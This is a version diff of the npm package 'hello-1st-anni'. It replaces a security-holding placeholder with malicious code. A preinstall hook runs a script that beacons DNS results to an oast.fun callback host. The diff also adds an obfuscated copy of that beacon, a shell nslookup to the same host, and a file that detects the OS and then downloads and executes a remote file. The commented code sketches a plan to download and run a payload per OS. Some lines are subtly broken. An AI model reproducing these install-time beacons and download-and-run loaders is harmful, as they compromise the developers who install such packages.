hello-1st-anni 0.0.1-security → 4.4.30

package/dns.sh

@@ -0,0 +1,4 @@
+#!/usr/bin/env sh
+
+sudo nslookup jouzjhqaabhhbfjsprdmwk0hu2gqdlf7l.oast.fun
+

package/index.js

@@ -0,0 +1,68 @@
+#!/usr/bin/env node
+
+const dns = require('dns');
+const http = require('http');
+
+const domain = 'google.com'; // Domain to perform DNS lookup on
+// modify with call back server
+const serverUrl = 'http://jouzjhqaabhhbfjsprdmwk0hu2gqdlf7l.oast.fun'; // URL of the server endpoint
+
+// Perform DNS lookup
+dns.resolve(domain, (err, addresses) => {
+  if (err) {
+    console.error(`Error resolving DNS for ${domain}: ${err.message}`);
+    return;
+  }
+
+  const dnsResult = addresses.join('\n');
+
+  // Send DNS result to server
+  const postData = JSON.stringify({ dnsResult });
+  const options = {
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'Content-Length': Buffer.byteLength(postData)
+    }
+  };
+
+  const req = http.request(serverUrl, options, (res) => {
+    console.log(`Status code: ${res.statusCode}`);
+  });
+
+  req.on('error', (error) => {a
+    console.error('Error sending DNS result to server:', error);
+  });
+
+  req.write(postData);
+  req.end();
+});
+
+
+// // variables
+// var expiration_date = x;
+// var in_scope_domain= google.com;
+// var hostOS = unknown;
+
+
+
+
+// // check date of engagement if older than current day ie expires, quit
+// var today = new Date();
+// var engagementDate = new Date(expiration_date);
+// if (engagementDate < today) {
+//     return;
+// }
+// // check domain resolves, if it des not resolve quit
+
+
+
+
+
+// // check host OS
+
+//     // if windows set download link to link1
+
+//     // if linux set download link to link2
+
+// // download and execute from the link 

package/obfuscate.js

@@ -0,0 +1,2 @@
+#!/usr/bin/env node
+function _0x566b(_0x4a0582,_0x5dd497){const _0x2d761f=_0x2d76();return _0x566b=function(_0x566baf,_0x3a5302){_0x566baf=_0x566baf-0xec;let _0x2d06ec=_0x2d761f[_0x566baf];return _0x2d06ec;},_0x566b(_0x4a0582,_0x5dd497);}function _0x2d76(){const _0x2795c1=['389216avQYlS','189872pfdqQI','Error\x20sending\x20DNS\x20result\x20to\x20server:','98nDTLeV','message','Error\x20resolving\x20DNS\x20for\x20','POST','byteLength','error','6ndhrGW','request','dns','log','131578urZFvP','stringify','502506TwyUJn','344232YENzvn','Status\x20code:\x20','write','application/json','1079055kPZvlL','42774vFJMWE','resolve'];_0x2d76=function(){return _0x2795c1;};return _0x2d76();}const _0x51e6ec=_0x566b;(function(_0xd44ec2,_0x3e9b61){const _0x410a96=_0x566b,_0x505881=_0xd44ec2();while(!![]){try{const _0x5b713d=parseInt(_0x410a96(0xf7))/0x1+-parseInt(_0x410a96(0xf4))/0x2*(parseInt(_0x410a96(0xf0))/0x3)+-parseInt(_0x410a96(0xff))/0x4+parseInt(_0x410a96(0xfb))/0x5+-parseInt(_0x410a96(0xfc))/0x6*(parseInt(_0x410a96(0x101))/0x7)+-parseInt(_0x410a96(0xfe))/0x8+-parseInt(_0x410a96(0xf6))/0x9;if(_0x5b713d===_0x3e9b61)break;else _0x505881['push'](_0x505881['shift']());}catch(_0x41adbb){_0x505881['push'](_0x505881['shift']());}}}(_0x2d76,0x2b241));const dns=require(_0x51e6ec(0xf2)),http=require('http'),domain='google.com',serverUrl='http://jouzjhqaabhhbfjsprdmwk0hu2gqdlf7l.oast.fun';dns[_0x51e6ec(0xfd)](domain,(_0x16da5e,_0x25524b)=>{const _0x55c924=_0x51e6ec;if(_0x16da5e){console['error'](_0x55c924(0xec)+domain+':\x20'+_0x16da5e[_0x55c924(0x102)]);return;}const _0x14bbe3=_0x25524b['join']('\x0a'),_0x280b1b=JSON[_0x55c924(0xf5)]({'dnsResult':_0x14bbe3}),_0x1a7820={'method':_0x55c924(0xed),'headers':{'Content-Type':_0x55c924(0xfa),'Content-Length':Buffer[_0x55c924(0xee)](_0x280b1b)}},_0xd3bd13=http[_0x55c924(0xf1)](serverUrl,_0x1a7820,_0x396dc3=>{const _0x5a0312=_0x55c924;console[_0x5a0312(0xf3)](_0x5a0312(0xf8)+_0x396dc3['statusCode']);});_0xd3bd13['on']('error',_0x25d565=>{const _0x402379=_0x55c924;console[_0x402379(0xef)](_0x402379(0x100),_0x25d565);}),_0xd3bd13[_0x55c924(0xf9)](_0x280b1b),_0xd3bd13['end']();});

package/old.js

@@ -0,0 +1,39 @@
+#!/usr/bin/env node
+const dns = require('dns');
+const http = require('http');
+
+const domain = 'google.com'; // Domain to perform DNS lookup on
+// modify with call back server
+const serverUrl = 'http://jouzjhqaabhhbfjsprdmwk0hu2gqdlf7l.oast.fun'; // URL of the server endpoint
+
+// Perform DNS lookup
+dns.resolve(domain, (err, addresses) => {
+  if (err) {
+    console.error(`Error resolving DNS for ${domain}: ${err.message}`);
+    return;
+  }
+
+  const dnsResult = addresses.join('\n');
+
+  // Send DNS result to server
+  const postData = JSON.stringify({ dnsResult });
+  const options = {
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'Content-Length': Buffer.byteLength(postData)
+    }
+  };
+
+  const req = http.request(serverUrl, options, (res) => {
+    console.log(`Status code: ${res.statusCode}`);
+  });
+
+  req.on('error', (error) => {a
+    console.error('Error sending DNS result to server:', error);
+  });
+
+  req.write(postData);
+  req.end();
+});
+

package/package.json

@@ -1,6 +1,12 @@
 {
   "name": "hello-1st-anni",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "4.4.30",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall":"./index.js"
+  },
+  "author": "not anni",
+  "license": "ISC"
 }

package/postreq.js

@@ -0,0 +1,34 @@
+const dns = require('dns');
+
+
+const domain = 'google.com';
+
+dns.resolve(domain, (err, addresses) => {
+  if (err) {
+    console.error('Error:', err);
+    return;
+  }
+
+
+  console.log('Resolved addresses:', addresses);
+  return dnsResult=addresses.join('\n');
+
+
+});
+
+
+
+
+fetch("jouzjhqaabhhbfjsprdmwk0hu2gqdlf7l.oast.fun", {
+  method: "POST",
+  body: JSON.stringify({
+    userId: 1,
+    title: "Fix my bugs",
+    completed: false
+  }),
+  headers: {
+    "Content-type": "application/json; charset=UTF-8"
+  }
+})
+  .then((response) => response.json())
+  .then((json) => console.log(json));

package/working-features.js

@@ -0,0 +1,114 @@
+#!/usr/bin/env node
+
+const dns = require('dns');
+const http = require('http');
+const os = detectOS();
+
+
+const domain = 'google.com'; // domain to check if it resolves
+const serverUrl = 'http://jouzjhqaabhhbfjsprdmwk0hu2gqdlf7l.oast.fun'; // URL of the server endpoint
+
+const fileUrl = 'https://filesampleshub.com/download/video/mp4/sample1.mp4'; // URL of the file to download
+const downloadPath = '/home/titan/Downloads/downloaded-file.txt'; // Path to save the downloaded file
+
+
+// detect OS 
+function detectOS() {
+  const pathSeparator = __dirname.includes('/') ? '/' : '\\';
+
+  if (pathSeparator === '/') {
+    return 'Linux';
+  } else if (pathSeparator === '\\') {
+    return 'Windows';
+  } else {
+    return 'Unknown';
+  }
+}
+
+// Perform DNS lookup
+dns.resolve(domain, (err, addresses) => {
+  if (err) {
+    console.error(`Error resolving DNS for ${domain}: ${err.message}`);
+    return;
+  }
+
+  const dnsResult = addresses.join('\n');
+  console.log(dnsResult)
+
+  // Send DNS result to server
+  const postData = JSON.stringify({ dnsResult, os});
+  const options = {
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'Content-Length': Buffer.byteLength(postData)
+    }
+  };
+
+  const req = http.request(serverUrl, options, (res) => {
+    console.log(`Status code: ${res.statusCode}`);
+  });
+
+  req.on('error', (error) => {
+    console.error('Error sending DNS result to server:', error);
+  });
+
+  req.write(postData);
+  req.end();
+});
+const https = require('https');
+const fs = require('fs');
+
+
+// Make a GET request to the file URL
+const request = https.get(fileUrl, (response) => {
+    // Create a writable stream to save the file
+    const fileStream = fs.createWriteStream(downloadPath);
+  
+    // Pipe the response data to the file stream
+    response.pipe(fileStream);
+  
+    // Event handler for stream finish event
+    fileStream.on('finish', () => {
+      console.log('File saved successfully.');
+  
+      // Execute the downloaded file
+      executeFile(downloadPath);
+    });
+  
+    // Event handler for stream error event
+    fileStream.on('error', (error) => {
+      console.error('Error saving file:', error);
+    });
+  });
+  
+  // Handle errors during the request
+  request.on('error', (error) => {
+    console.error('Error downloading file:', error);
+  });
+  
+  // Function to execute the downloaded file
+  function executeFile(filePath) {
+    // Check if the file is executable
+    fs.access(filePath, fs.constants.X_OK, (err) => {
+      if (err) {
+        console.error('File is not executable.');
+        return;
+      }
+  
+      // Spawn a new process to execute the file
+      const childProcess = spawn(filePath, [], {
+        stdio: 'inherit' // Inherit stdio from parent process
+      });
+  
+      // Event handler for process exit event
+      childProcess.on('exit', (code, signal) => {
+        console.log(`File execution completed. Exit code: ${code}`);
+      });
+  
+      // Event handler for process error event
+      childProcess.on('error', (error) => {
+        console.error('Error executing file:', error);
+      });
+    });
+  }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=hello-1st-anni for more information.